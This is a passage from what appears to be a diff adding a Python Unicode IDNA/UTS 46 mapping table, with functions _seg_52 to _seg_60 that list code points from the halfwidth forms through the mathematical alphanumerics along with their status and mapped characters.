'ッ'), + (0xFF70, 'M', 'ー'), + (0xFF71, 'M', 'ア'), + (0xFF72, 'M', 'イ'), + (0xFF73, 'M', 'ウ'), + (0xFF74, 'M', 'エ'), + (0xFF75, 'M', 'オ'), + (0xFF76, 'M', 'カ'), + (0xFF77, 'M', 'キ'), + (0xFF78, 'M', 'ク'), + (0xFF79, 'M', 'ケ'), + (0xFF7A, 'M', 'コ'), + (0xFF7B, 'M', 'サ'), + (0xFF7C, 'M', 'シ'), + (0xFF7D, 'M', 'ス'), + (0xFF7E, 'M', 'セ'), + ] + +def _seg_52() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFF7F, 'M', 'ソ'), + (0xFF80, 'M', 'タ'), + (0xFF81, 'M', 'チ'), + (0xFF82, 'M', 'ツ'), + (0xFF83, 'M', 'テ'), + (0xFF84, 'M', 'ト'), + (0xFF85, 'M', 'ナ'), + (0xFF86, 'M', 'ニ'), + (0xFF87, 'M', 'ヌ'), + (0xFF88, 'M', 'ネ'), + (0xFF89, 'M', 'ノ'), + (0xFF8A, 'M', 'ハ'), + (0xFF8B, 'M', 'ヒ'), + (0xFF8C, 'M', 'フ'), + (0xFF8D, 'M', 'ヘ'), + (0xFF8E, 'M', 'ホ'), + (0xFF8F, 'M', 'マ'), + (0xFF90, 'M', 'ミ'), + (0xFF91, 'M', 'ム'), + (0xFF92, 'M', 'メ'), + (0xFF93, 'M', 'モ'), + (0xFF94, 'M', 'ヤ'), + (0xFF95, 'M', 'ユ'), + (0xFF96, 'M', 'ヨ'), + (0xFF97, 'M', 'ラ'), + (0xFF98, 'M', 'リ'), + (0xFF99, 'M', 'ル'), + (0xFF9A, 'M', 'レ'), + (0xFF9B, 'M', 'ロ'), + (0xFF9C, 'M', 'ワ'), + (0xFF9D, 'M', 'ン'), + (0xFF9E, 'M', '゙'), + (0xFF9F, 'M', '゚'), + (0xFFA0, 'X'), + (0xFFA1, 'M', 'ᄀ'), + (0xFFA2, 'M', 'ᄁ'), + (0xFFA3, 'M', 'ᆪ'), + (0xFFA4, 'M', 'ᄂ'), + (0xFFA5, 'M', 'ᆬ'), + (0xFFA6, 'M', 'ᆭ'), + (0xFFA7, 'M', 'ᄃ'), + (0xFFA8, 'M', 'ᄄ'), + (0xFFA9, 'M', 'ᄅ'), + (0xFFAA, 'M', 'ᆰ'), + (0xFFAB, 'M', 'ᆱ'), + (0xFFAC, 'M', 'ᆲ'), + (0xFFAD, 'M', 'ᆳ'), + (0xFFAE, 'M', 'ᆴ'), + (0xFFAF, 'M', 'ᆵ'), + (0xFFB0, 'M', 'ᄚ'), + (0xFFB1, 'M', 'ᄆ'), + (0xFFB2, 'M', 'ᄇ'), + (0xFFB3, 'M', 'ᄈ'), + (0xFFB4, 'M', 'ᄡ'), + (0xFFB5, 'M', 'ᄉ'), + (0xFFB6, 'M', 'ᄊ'), + (0xFFB7, 'M', 'ᄋ'), + (0xFFB8, 'M', 'ᄌ'), + (0xFFB9, 'M', 'ᄍ'), + (0xFFBA, 'M', 'ᄎ'), + (0xFFBB, 'M', 'ᄏ'), + (0xFFBC, 'M', 'ᄐ'), + (0xFFBD, 'M', 'ᄑ'), + (0xFFBE, 'M', 'ᄒ'), + (0xFFBF, 'X'), + (0xFFC2, 'M', 'ᅡ'), + (0xFFC3, 'M', 'ᅢ'), + (0xFFC4, 'M', 'ᅣ'), + (0xFFC5, 'M', 'ᅤ'), + (0xFFC6, 'M', 'ᅥ'), + (0xFFC7, 'M', 'ᅦ'), + (0xFFC8, 'X'), + (0xFFCA, 'M', 'ᅧ'), + (0xFFCB, 'M', 'ᅨ'), + (0xFFCC, 'M', 'ᅩ'), + (0xFFCD, 'M', 'ᅪ'), + (0xFFCE, 'M', 'ᅫ'), + (0xFFCF, 'M', 'ᅬ'), + (0xFFD0, 'X'), + (0xFFD2, 'M', 'ᅭ'), + (0xFFD3, 'M', 'ᅮ'), + (0xFFD4, 'M', 'ᅯ'), + (0xFFD5, 'M', 'ᅰ'), + (0xFFD6, 'M', 'ᅱ'), + (0xFFD7, 'M', 'ᅲ'), + (0xFFD8, 'X'), + (0xFFDA, 'M', 'ᅳ'), + (0xFFDB, 'M', 'ᅴ'), + (0xFFDC, 'M', 'ᅵ'), + (0xFFDD, 'X'), + (0xFFE0, 'M', '¢'), + (0xFFE1, 'M', '£'), + (0xFFE2, 'M', '¬'), + (0xFFE3, '3', ' ̄'), + (0xFFE4, 'M', '¦'), + (0xFFE5, 'M', '¥'), + (0xFFE6, 'M', '₩'), + (0xFFE7, 'X'), + (0xFFE8, 'M', '│'), + (0xFFE9, 'M', '←'), + ] + +def _seg_53() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFFEA, 'M', '↑'), + (0xFFEB, 'M', '→'), + (0xFFEC, 'M', '↓'), + (0xFFED, 'M', '■'), + 
(0xFFEE, 'M', '○'), + (0xFFEF, 'X'), + (0x10000, 'V'), + (0x1000C, 'X'), + (0x1000D, 'V'), + (0x10027, 'X'), + (0x10028, 'V'), + (0x1003B, 'X'), + (0x1003C, 'V'), + (0x1003E, 'X'), + (0x1003F, 'V'), + (0x1004E, 'X'), + (0x10050, 'V'), + (0x1005E, 'X'), + (0x10080, 'V'), + (0x100FB, 'X'), + (0x10100, 'V'), + (0x10103, 'X'), + (0x10107, 'V'), + (0x10134, 'X'), + (0x10137, 'V'), + (0x1018F, 'X'), + (0x10190, 'V'), + (0x1019D, 'X'), + (0x101A0, 'V'), + (0x101A1, 'X'), + (0x101D0, 'V'), + (0x101FE, 'X'), + (0x10280, 'V'), + (0x1029D, 'X'), + (0x102A0, 'V'), + (0x102D1, 'X'), + (0x102E0, 'V'), + (0x102FC, 'X'), + (0x10300, 'V'), + (0x10324, 'X'), + (0x1032D, 'V'), + (0x1034B, 'X'), + (0x10350, 'V'), + (0x1037B, 'X'), + (0x10380, 'V'), + (0x1039E, 'X'), + (0x1039F, 'V'), + (0x103C4, 'X'), + (0x103C8, 'V'), + (0x103D6, 'X'), + (0x10400, 'M', '𐐨'), + (0x10401, 'M', '𐐩'), + (0x10402, 'M', '𐐪'), + (0x10403, 'M', '𐐫'), + (0x10404, 'M', '𐐬'), + (0x10405, 'M', '𐐭'), + (0x10406, 'M', '𐐮'), + (0x10407, 'M', '𐐯'), + (0x10408, 'M', '𐐰'), + (0x10409, 'M', '𐐱'), + (0x1040A, 'M', '𐐲'), + (0x1040B, 'M', '𐐳'), + (0x1040C, 'M', '𐐴'), + (0x1040D, 'M', '𐐵'), + (0x1040E, 'M', '𐐶'), + (0x1040F, 'M', '𐐷'), + (0x10410, 'M', '𐐸'), + (0x10411, 'M', '𐐹'), + (0x10412, 'M', '𐐺'), + (0x10413, 'M', '𐐻'), + (0x10414, 'M', '𐐼'), + (0x10415, 'M', '𐐽'), + (0x10416, 'M', '𐐾'), + (0x10417, 'M', '𐐿'), + (0x10418, 'M', '𐑀'), + (0x10419, 'M', '𐑁'), + (0x1041A, 'M', '𐑂'), + (0x1041B, 'M', '𐑃'), + (0x1041C, 'M', '𐑄'), + (0x1041D, 'M', '𐑅'), + (0x1041E, 'M', '𐑆'), + (0x1041F, 'M', '𐑇'), + (0x10420, 'M', '𐑈'), + (0x10421, 'M', '𐑉'), + (0x10422, 'M', '𐑊'), + (0x10423, 'M', '𐑋'), + (0x10424, 'M', '𐑌'), + (0x10425, 'M', '𐑍'), + (0x10426, 'M', '𐑎'), + (0x10427, 'M', '𐑏'), + (0x10428, 'V'), + (0x1049E, 'X'), + (0x104A0, 'V'), + (0x104AA, 'X'), + (0x104B0, 'M', '𐓘'), + (0x104B1, 'M', '𐓙'), + (0x104B2, 'M', '𐓚'), + (0x104B3, 'M', '𐓛'), + (0x104B4, 'M', '𐓜'), + (0x104B5, 'M', '𐓝'), + ] + +def _seg_54() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x104B6, 'M', '𐓞'), + (0x104B7, 'M', '𐓟'), + (0x104B8, 'M', '𐓠'), + (0x104B9, 'M', '𐓡'), + (0x104BA, 'M', '𐓢'), + (0x104BB, 'M', '𐓣'), + (0x104BC, 'M', '𐓤'), + (0x104BD, 'M', '𐓥'), + (0x104BE, 'M', '𐓦'), + (0x104BF, 'M', '𐓧'), + (0x104C0, 'M', '𐓨'), + (0x104C1, 'M', '𐓩'), + (0x104C2, 'M', '𐓪'), + (0x104C3, 'M', '𐓫'), + (0x104C4, 'M', '𐓬'), + (0x104C5, 'M', '𐓭'), + (0x104C6, 'M', '𐓮'), + (0x104C7, 'M', '𐓯'), + (0x104C8, 'M', '𐓰'), + (0x104C9, 'M', '𐓱'), + (0x104CA, 'M', '𐓲'), + (0x104CB, 'M', '𐓳'), + (0x104CC, 'M', '𐓴'), + (0x104CD, 'M', '𐓵'), + (0x104CE, 'M', '𐓶'), + (0x104CF, 'M', '𐓷'), + (0x104D0, 'M', '𐓸'), + (0x104D1, 'M', '𐓹'), + (0x104D2, 'M', '𐓺'), + (0x104D3, 'M', '𐓻'), + (0x104D4, 'X'), + (0x104D8, 'V'), + (0x104FC, 'X'), + (0x10500, 'V'), + (0x10528, 'X'), + (0x10530, 'V'), + (0x10564, 'X'), + (0x1056F, 'V'), + (0x10570, 'M', '𐖗'), + (0x10571, 'M', '𐖘'), + (0x10572, 'M', '𐖙'), + (0x10573, 'M', '𐖚'), + (0x10574, 'M', '𐖛'), + (0x10575, 'M', '𐖜'), + (0x10576, 'M', '𐖝'), + (0x10577, 'M', '𐖞'), + (0x10578, 'M', '𐖟'), + (0x10579, 'M', '𐖠'), + (0x1057A, 'M', '𐖡'), + (0x1057B, 'X'), + (0x1057C, 'M', '𐖣'), + (0x1057D, 'M', '𐖤'), + (0x1057E, 'M', '𐖥'), + (0x1057F, 'M', '𐖦'), + (0x10580, 'M', '𐖧'), + (0x10581, 'M', '𐖨'), + (0x10582, 'M', '𐖩'), + (0x10583, 'M', '𐖪'), + (0x10584, 'M', '𐖫'), + (0x10585, 'M', '𐖬'), + (0x10586, 'M', '𐖭'), + (0x10587, 'M', '𐖮'), + (0x10588, 'M', '𐖯'), + (0x10589, 'M', '𐖰'), + (0x1058A, 'M', '𐖱'), + (0x1058B, 'X'), + (0x1058C, 'M', '𐖳'), + (0x1058D, 'M', 
'𐖴'), + (0x1058E, 'M', '𐖵'), + (0x1058F, 'M', '𐖶'), + (0x10590, 'M', '𐖷'), + (0x10591, 'M', '𐖸'), + (0x10592, 'M', '𐖹'), + (0x10593, 'X'), + (0x10594, 'M', '𐖻'), + (0x10595, 'M', '𐖼'), + (0x10596, 'X'), + (0x10597, 'V'), + (0x105A2, 'X'), + (0x105A3, 'V'), + (0x105B2, 'X'), + (0x105B3, 'V'), + (0x105BA, 'X'), + (0x105BB, 'V'), + (0x105BD, 'X'), + (0x10600, 'V'), + (0x10737, 'X'), + (0x10740, 'V'), + (0x10756, 'X'), + (0x10760, 'V'), + (0x10768, 'X'), + (0x10780, 'V'), + (0x10781, 'M', 'ː'), + (0x10782, 'M', 'ˑ'), + (0x10783, 'M', 'æ'), + (0x10784, 'M', 'ʙ'), + (0x10785, 'M', 'ɓ'), + (0x10786, 'X'), + (0x10787, 'M', 'ʣ'), + (0x10788, 'M', 'ꭦ'), + ] + +def _seg_55() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x10789, 'M', 'ʥ'), + (0x1078A, 'M', 'ʤ'), + (0x1078B, 'M', 'ɖ'), + (0x1078C, 'M', 'ɗ'), + (0x1078D, 'M', 'ᶑ'), + (0x1078E, 'M', 'ɘ'), + (0x1078F, 'M', 'ɞ'), + (0x10790, 'M', 'ʩ'), + (0x10791, 'M', 'ɤ'), + (0x10792, 'M', 'ɢ'), + (0x10793, 'M', 'ɠ'), + (0x10794, 'M', 'ʛ'), + (0x10795, 'M', 'ħ'), + (0x10796, 'M', 'ʜ'), + (0x10797, 'M', 'ɧ'), + (0x10798, 'M', 'ʄ'), + (0x10799, 'M', 'ʪ'), + (0x1079A, 'M', 'ʫ'), + (0x1079B, 'M', 'ɬ'), + (0x1079C, 'M', '𝼄'), + (0x1079D, 'M', 'ꞎ'), + (0x1079E, 'M', 'ɮ'), + (0x1079F, 'M', '𝼅'), + (0x107A0, 'M', 'ʎ'), + (0x107A1, 'M', '𝼆'), + (0x107A2, 'M', 'ø'), + (0x107A3, 'M', 'ɶ'), + (0x107A4, 'M', 'ɷ'), + (0x107A5, 'M', 'q'), + (0x107A6, 'M', 'ɺ'), + (0x107A7, 'M', '𝼈'), + (0x107A8, 'M', 'ɽ'), + (0x107A9, 'M', 'ɾ'), + (0x107AA, 'M', 'ʀ'), + (0x107AB, 'M', 'ʨ'), + (0x107AC, 'M', 'ʦ'), + (0x107AD, 'M', 'ꭧ'), + (0x107AE, 'M', 'ʧ'), + (0x107AF, 'M', 'ʈ'), + (0x107B0, 'M', 'ⱱ'), + (0x107B1, 'X'), + (0x107B2, 'M', 'ʏ'), + (0x107B3, 'M', 'ʡ'), + (0x107B4, 'M', 'ʢ'), + (0x107B5, 'M', 'ʘ'), + (0x107B6, 'M', 'ǀ'), + (0x107B7, 'M', 'ǁ'), + (0x107B8, 'M', 'ǂ'), + (0x107B9, 'M', '𝼊'), + (0x107BA, 'M', '𝼞'), + (0x107BB, 'X'), + (0x10800, 'V'), + (0x10806, 'X'), + (0x10808, 'V'), + (0x10809, 'X'), + (0x1080A, 'V'), + (0x10836, 'X'), + (0x10837, 'V'), + (0x10839, 'X'), + (0x1083C, 'V'), + (0x1083D, 'X'), + (0x1083F, 'V'), + (0x10856, 'X'), + (0x10857, 'V'), + (0x1089F, 'X'), + (0x108A7, 'V'), + (0x108B0, 'X'), + (0x108E0, 'V'), + (0x108F3, 'X'), + (0x108F4, 'V'), + (0x108F6, 'X'), + (0x108FB, 'V'), + (0x1091C, 'X'), + (0x1091F, 'V'), + (0x1093A, 'X'), + (0x1093F, 'V'), + (0x10940, 'X'), + (0x10980, 'V'), + (0x109B8, 'X'), + (0x109BC, 'V'), + (0x109D0, 'X'), + (0x109D2, 'V'), + (0x10A04, 'X'), + (0x10A05, 'V'), + (0x10A07, 'X'), + (0x10A0C, 'V'), + (0x10A14, 'X'), + (0x10A15, 'V'), + (0x10A18, 'X'), + (0x10A19, 'V'), + (0x10A36, 'X'), + (0x10A38, 'V'), + (0x10A3B, 'X'), + (0x10A3F, 'V'), + (0x10A49, 'X'), + (0x10A50, 'V'), + (0x10A59, 'X'), + (0x10A60, 'V'), + (0x10AA0, 'X'), + (0x10AC0, 'V'), + ] + +def _seg_56() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x10AE7, 'X'), + (0x10AEB, 'V'), + (0x10AF7, 'X'), + (0x10B00, 'V'), + (0x10B36, 'X'), + (0x10B39, 'V'), + (0x10B56, 'X'), + (0x10B58, 'V'), + (0x10B73, 'X'), + (0x10B78, 'V'), + (0x10B92, 'X'), + (0x10B99, 'V'), + (0x10B9D, 'X'), + (0x10BA9, 'V'), + (0x10BB0, 'X'), + (0x10C00, 'V'), + (0x10C49, 'X'), + (0x10C80, 'M', '𐳀'), + (0x10C81, 'M', '𐳁'), + (0x10C82, 'M', '𐳂'), + (0x10C83, 'M', '𐳃'), + (0x10C84, 'M', '𐳄'), + (0x10C85, 'M', '𐳅'), + (0x10C86, 'M', '𐳆'), + (0x10C87, 'M', '𐳇'), + (0x10C88, 'M', '𐳈'), + (0x10C89, 'M', '𐳉'), + (0x10C8A, 'M', '𐳊'), + (0x10C8B, 'M', '𐳋'), + (0x10C8C, 'M', '𐳌'), + (0x10C8D, 'M', '𐳍'), + (0x10C8E, 'M', '𐳎'), + (0x10C8F, 'M', '𐳏'), + 
(0x10C90, 'M', '𐳐'), + (0x10C91, 'M', '𐳑'), + (0x10C92, 'M', '𐳒'), + (0x10C93, 'M', '𐳓'), + (0x10C94, 'M', '𐳔'), + (0x10C95, 'M', '𐳕'), + (0x10C96, 'M', '𐳖'), + (0x10C97, 'M', '𐳗'), + (0x10C98, 'M', '𐳘'), + (0x10C99, 'M', '𐳙'), + (0x10C9A, 'M', '𐳚'), + (0x10C9B, 'M', '𐳛'), + (0x10C9C, 'M', '𐳜'), + (0x10C9D, 'M', '𐳝'), + (0x10C9E, 'M', '𐳞'), + (0x10C9F, 'M', '𐳟'), + (0x10CA0, 'M', '𐳠'), + (0x10CA1, 'M', '𐳡'), + (0x10CA2, 'M', '𐳢'), + (0x10CA3, 'M', '𐳣'), + (0x10CA4, 'M', '𐳤'), + (0x10CA5, 'M', '𐳥'), + (0x10CA6, 'M', '𐳦'), + (0x10CA7, 'M', '𐳧'), + (0x10CA8, 'M', '𐳨'), + (0x10CA9, 'M', '𐳩'), + (0x10CAA, 'M', '𐳪'), + (0x10CAB, 'M', '𐳫'), + (0x10CAC, 'M', '𐳬'), + (0x10CAD, 'M', '𐳭'), + (0x10CAE, 'M', '𐳮'), + (0x10CAF, 'M', '𐳯'), + (0x10CB0, 'M', '𐳰'), + (0x10CB1, 'M', '𐳱'), + (0x10CB2, 'M', '𐳲'), + (0x10CB3, 'X'), + (0x10CC0, 'V'), + (0x10CF3, 'X'), + (0x10CFA, 'V'), + (0x10D28, 'X'), + (0x10D30, 'V'), + (0x10D3A, 'X'), + (0x10E60, 'V'), + (0x10E7F, 'X'), + (0x10E80, 'V'), + (0x10EAA, 'X'), + (0x10EAB, 'V'), + (0x10EAE, 'X'), + (0x10EB0, 'V'), + (0x10EB2, 'X'), + (0x10F00, 'V'), + (0x10F28, 'X'), + (0x10F30, 'V'), + (0x10F5A, 'X'), + (0x10F70, 'V'), + (0x10F8A, 'X'), + (0x10FB0, 'V'), + (0x10FCC, 'X'), + (0x10FE0, 'V'), + (0x10FF7, 'X'), + (0x11000, 'V'), + (0x1104E, 'X'), + (0x11052, 'V'), + (0x11076, 'X'), + (0x1107F, 'V'), + (0x110BD, 'X'), + (0x110BE, 'V'), + ] + +def _seg_57() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x110C3, 'X'), + (0x110D0, 'V'), + (0x110E9, 'X'), + (0x110F0, 'V'), + (0x110FA, 'X'), + (0x11100, 'V'), + (0x11135, 'X'), + (0x11136, 'V'), + (0x11148, 'X'), + (0x11150, 'V'), + (0x11177, 'X'), + (0x11180, 'V'), + (0x111E0, 'X'), + (0x111E1, 'V'), + (0x111F5, 'X'), + (0x11200, 'V'), + (0x11212, 'X'), + (0x11213, 'V'), + (0x1123F, 'X'), + (0x11280, 'V'), + (0x11287, 'X'), + (0x11288, 'V'), + (0x11289, 'X'), + (0x1128A, 'V'), + (0x1128E, 'X'), + (0x1128F, 'V'), + (0x1129E, 'X'), + (0x1129F, 'V'), + (0x112AA, 'X'), + (0x112B0, 'V'), + (0x112EB, 'X'), + (0x112F0, 'V'), + (0x112FA, 'X'), + (0x11300, 'V'), + (0x11304, 'X'), + (0x11305, 'V'), + (0x1130D, 'X'), + (0x1130F, 'V'), + (0x11311, 'X'), + (0x11313, 'V'), + (0x11329, 'X'), + (0x1132A, 'V'), + (0x11331, 'X'), + (0x11332, 'V'), + (0x11334, 'X'), + (0x11335, 'V'), + (0x1133A, 'X'), + (0x1133B, 'V'), + (0x11345, 'X'), + (0x11347, 'V'), + (0x11349, 'X'), + (0x1134B, 'V'), + (0x1134E, 'X'), + (0x11350, 'V'), + (0x11351, 'X'), + (0x11357, 'V'), + (0x11358, 'X'), + (0x1135D, 'V'), + (0x11364, 'X'), + (0x11366, 'V'), + (0x1136D, 'X'), + (0x11370, 'V'), + (0x11375, 'X'), + (0x11400, 'V'), + (0x1145C, 'X'), + (0x1145D, 'V'), + (0x11462, 'X'), + (0x11480, 'V'), + (0x114C8, 'X'), + (0x114D0, 'V'), + (0x114DA, 'X'), + (0x11580, 'V'), + (0x115B6, 'X'), + (0x115B8, 'V'), + (0x115DE, 'X'), + (0x11600, 'V'), + (0x11645, 'X'), + (0x11650, 'V'), + (0x1165A, 'X'), + (0x11660, 'V'), + (0x1166D, 'X'), + (0x11680, 'V'), + (0x116BA, 'X'), + (0x116C0, 'V'), + (0x116CA, 'X'), + (0x11700, 'V'), + (0x1171B, 'X'), + (0x1171D, 'V'), + (0x1172C, 'X'), + (0x11730, 'V'), + (0x11747, 'X'), + (0x11800, 'V'), + (0x1183C, 'X'), + (0x118A0, 'M', '𑣀'), + (0x118A1, 'M', '𑣁'), + (0x118A2, 'M', '𑣂'), + (0x118A3, 'M', '𑣃'), + (0x118A4, 'M', '𑣄'), + (0x118A5, 'M', '𑣅'), + (0x118A6, 'M', '𑣆'), + ] + +def _seg_58() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x118A7, 'M', '𑣇'), + (0x118A8, 'M', '𑣈'), + (0x118A9, 'M', '𑣉'), + (0x118AA, 'M', '𑣊'), + (0x118AB, 'M', '𑣋'), + (0x118AC, 'M', '𑣌'), + (0x118AD, 'M', '𑣍'), + 
(0x118AE, 'M', '𑣎'), + (0x118AF, 'M', '𑣏'), + (0x118B0, 'M', '𑣐'), + (0x118B1, 'M', '𑣑'), + (0x118B2, 'M', '𑣒'), + (0x118B3, 'M', '𑣓'), + (0x118B4, 'M', '𑣔'), + (0x118B5, 'M', '𑣕'), + (0x118B6, 'M', '𑣖'), + (0x118B7, 'M', '𑣗'), + (0x118B8, 'M', '𑣘'), + (0x118B9, 'M', '𑣙'), + (0x118BA, 'M', '𑣚'), + (0x118BB, 'M', '𑣛'), + (0x118BC, 'M', '𑣜'), + (0x118BD, 'M', '𑣝'), + (0x118BE, 'M', '𑣞'), + (0x118BF, 'M', '𑣟'), + (0x118C0, 'V'), + (0x118F3, 'X'), + (0x118FF, 'V'), + (0x11907, 'X'), + (0x11909, 'V'), + (0x1190A, 'X'), + (0x1190C, 'V'), + (0x11914, 'X'), + (0x11915, 'V'), + (0x11917, 'X'), + (0x11918, 'V'), + (0x11936, 'X'), + (0x11937, 'V'), + (0x11939, 'X'), + (0x1193B, 'V'), + (0x11947, 'X'), + (0x11950, 'V'), + (0x1195A, 'X'), + (0x119A0, 'V'), + (0x119A8, 'X'), + (0x119AA, 'V'), + (0x119D8, 'X'), + (0x119DA, 'V'), + (0x119E5, 'X'), + (0x11A00, 'V'), + (0x11A48, 'X'), + (0x11A50, 'V'), + (0x11AA3, 'X'), + (0x11AB0, 'V'), + (0x11AF9, 'X'), + (0x11C00, 'V'), + (0x11C09, 'X'), + (0x11C0A, 'V'), + (0x11C37, 'X'), + (0x11C38, 'V'), + (0x11C46, 'X'), + (0x11C50, 'V'), + (0x11C6D, 'X'), + (0x11C70, 'V'), + (0x11C90, 'X'), + (0x11C92, 'V'), + (0x11CA8, 'X'), + (0x11CA9, 'V'), + (0x11CB7, 'X'), + (0x11D00, 'V'), + (0x11D07, 'X'), + (0x11D08, 'V'), + (0x11D0A, 'X'), + (0x11D0B, 'V'), + (0x11D37, 'X'), + (0x11D3A, 'V'), + (0x11D3B, 'X'), + (0x11D3C, 'V'), + (0x11D3E, 'X'), + (0x11D3F, 'V'), + (0x11D48, 'X'), + (0x11D50, 'V'), + (0x11D5A, 'X'), + (0x11D60, 'V'), + (0x11D66, 'X'), + (0x11D67, 'V'), + (0x11D69, 'X'), + (0x11D6A, 'V'), + (0x11D8F, 'X'), + (0x11D90, 'V'), + (0x11D92, 'X'), + (0x11D93, 'V'), + (0x11D99, 'X'), + (0x11DA0, 'V'), + (0x11DAA, 'X'), + (0x11EE0, 'V'), + (0x11EF9, 'X'), + (0x11FB0, 'V'), + (0x11FB1, 'X'), + (0x11FC0, 'V'), + ] + +def _seg_59() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x11FF2, 'X'), + (0x11FFF, 'V'), + (0x1239A, 'X'), + (0x12400, 'V'), + (0x1246F, 'X'), + (0x12470, 'V'), + (0x12475, 'X'), + (0x12480, 'V'), + (0x12544, 'X'), + (0x12F90, 'V'), + (0x12FF3, 'X'), + (0x13000, 'V'), + (0x1342F, 'X'), + (0x14400, 'V'), + (0x14647, 'X'), + (0x16800, 'V'), + (0x16A39, 'X'), + (0x16A40, 'V'), + (0x16A5F, 'X'), + (0x16A60, 'V'), + (0x16A6A, 'X'), + (0x16A6E, 'V'), + (0x16ABF, 'X'), + (0x16AC0, 'V'), + (0x16ACA, 'X'), + (0x16AD0, 'V'), + (0x16AEE, 'X'), + (0x16AF0, 'V'), + (0x16AF6, 'X'), + (0x16B00, 'V'), + (0x16B46, 'X'), + (0x16B50, 'V'), + (0x16B5A, 'X'), + (0x16B5B, 'V'), + (0x16B62, 'X'), + (0x16B63, 'V'), + (0x16B78, 'X'), + (0x16B7D, 'V'), + (0x16B90, 'X'), + (0x16E40, 'M', '𖹠'), + (0x16E41, 'M', '𖹡'), + (0x16E42, 'M', '𖹢'), + (0x16E43, 'M', '𖹣'), + (0x16E44, 'M', '𖹤'), + (0x16E45, 'M', '𖹥'), + (0x16E46, 'M', '𖹦'), + (0x16E47, 'M', '𖹧'), + (0x16E48, 'M', '𖹨'), + (0x16E49, 'M', '𖹩'), + (0x16E4A, 'M', '𖹪'), + (0x16E4B, 'M', '𖹫'), + (0x16E4C, 'M', '𖹬'), + (0x16E4D, 'M', '𖹭'), + (0x16E4E, 'M', '𖹮'), + (0x16E4F, 'M', '𖹯'), + (0x16E50, 'M', '𖹰'), + (0x16E51, 'M', '𖹱'), + (0x16E52, 'M', '𖹲'), + (0x16E53, 'M', '𖹳'), + (0x16E54, 'M', '𖹴'), + (0x16E55, 'M', '𖹵'), + (0x16E56, 'M', '𖹶'), + (0x16E57, 'M', '𖹷'), + (0x16E58, 'M', '𖹸'), + (0x16E59, 'M', '𖹹'), + (0x16E5A, 'M', '𖹺'), + (0x16E5B, 'M', '𖹻'), + (0x16E5C, 'M', '𖹼'), + (0x16E5D, 'M', '𖹽'), + (0x16E5E, 'M', '𖹾'), + (0x16E5F, 'M', '𖹿'), + (0x16E60, 'V'), + (0x16E9B, 'X'), + (0x16F00, 'V'), + (0x16F4B, 'X'), + (0x16F4F, 'V'), + (0x16F88, 'X'), + (0x16F8F, 'V'), + (0x16FA0, 'X'), + (0x16FE0, 'V'), + (0x16FE5, 'X'), + (0x16FF0, 'V'), + (0x16FF2, 'X'), + (0x17000, 'V'), + (0x187F8, 'X'), + (0x18800, 
'V'), + (0x18CD6, 'X'), + (0x18D00, 'V'), + (0x18D09, 'X'), + (0x1AFF0, 'V'), + (0x1AFF4, 'X'), + (0x1AFF5, 'V'), + (0x1AFFC, 'X'), + (0x1AFFD, 'V'), + (0x1AFFF, 'X'), + (0x1B000, 'V'), + (0x1B123, 'X'), + (0x1B150, 'V'), + (0x1B153, 'X'), + (0x1B164, 'V'), + ] + +def _seg_60() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1B168, 'X'), + (0x1B170, 'V'), + (0x1B2FC, 'X'), + (0x1BC00, 'V'), + (0x1BC6B, 'X'), + (0x1BC70, 'V'), + (0x1BC7D, 'X'), + (0x1BC80, 'V'), + (0x1BC89, 'X'), + (0x1BC90, 'V'), + (0x1BC9A, 'X'), + (0x1BC9C, 'V'), + (0x1BCA0, 'I'), + (0x1BCA4, 'X'), + (0x1CF00, 'V'), + (0x1CF2E, 'X'), + (0x1CF30, 'V'), + (0x1CF47, 'X'), + (0x1CF50, 'V'), + (0x1CFC4, 'X'), + (0x1D000, 'V'), + (0x1D0F6, 'X'), + (0x1D100, 'V'), + (0x1D127, 'X'), + (0x1D129, 'V'), + (0x1D15E, 'M', '𝅗𝅥'), + (0x1D15F, 'M', '𝅘𝅥'), + (0x1D160, 'M', '𝅘𝅥𝅮'), + (0x1D161, 'M', '𝅘𝅥𝅯'), + (0x1D162, 'M', '𝅘𝅥𝅰'), + (0x1D163, 'M', '𝅘𝅥𝅱'), + (0x1D164, 'M', '𝅘𝅥𝅲'), + (0x1D165, 'V'), + (0x1D173, 'X'), + (0x1D17B, 'V'), + (0x1D1BB, 'M', '𝆹𝅥'), + (0x1D1BC, 'M', '𝆺𝅥'), + (0x1D1BD, 'M', '𝆹𝅥𝅮'), + (0x1D1BE, 'M', '𝆺𝅥𝅮'), + (0x1D1BF, 'M', '𝆹𝅥𝅯'), + (0x1D1C0, 'M', '𝆺𝅥𝅯'), + (0x1D1C1, 'V'), + (0x1D1EB, 'X'), + (0x1D200, 'V'), + (0x1D246, 'X'), + (0x1D2E0, 'V'), + (0x1D2F4, 'X'), + (0x1D300, 'V'), + (0x1D357, 'X'), + (0x1D360, 'V'), + (0x1D379, 'X'), + (0x1D400, 'M', 'a'), + (0x1D401, 'M', 'b'), + (0x1D402, 'M', 'c'), + (0x1D403, 'M', 'd'), + (0x1D404, 'M', 'e'), + (0x1D405, 'M', 'f'), + (0x1D406, 'M', 'g'), + (0x1D407, 'M', 'h'), + (0x1D408, 'M', 'i'), + (0x1D409, 'M', 'j'), + (0x1D40A, 'M', 'k'), + (0x1D40B, 'M', 'l'), + (0x1D40C, 'M', 'm'), + (0x1D40D, 'M', 'n'), + (0x1D40E, 'M', 'o'), + (0x1D40F, 'M', 'p'), + (0x1D410, 'M', 'q'), + (0x1D411, 'M', 'r'), + (0x1D412, 'M', 's'), + (0x1D413, 'M', 't'), + (0x1D414, 'M', 'u'), + (0x1D415, 'M', 'v'), + (0x1D416, 'M', 'w'), + (0x1D417, 'M', 'x'), + (0x1D418, 'M', 'y'), + (0x1D419, 'M', 'z'), + (0x1D41A, 'M', 'a'), + (0x1D41B, 'M', 'b'), + (0x1D41C, 'M', 'c'), + (0x1D41D, 'M', 'd'), + (0x1D41E, 'M', 'e'), + (0x1D41F, 'M', 'f'), + (0x1D420, 'M', 'g'), + (0x1D421, 'M', 'h'), + (0x1D422, 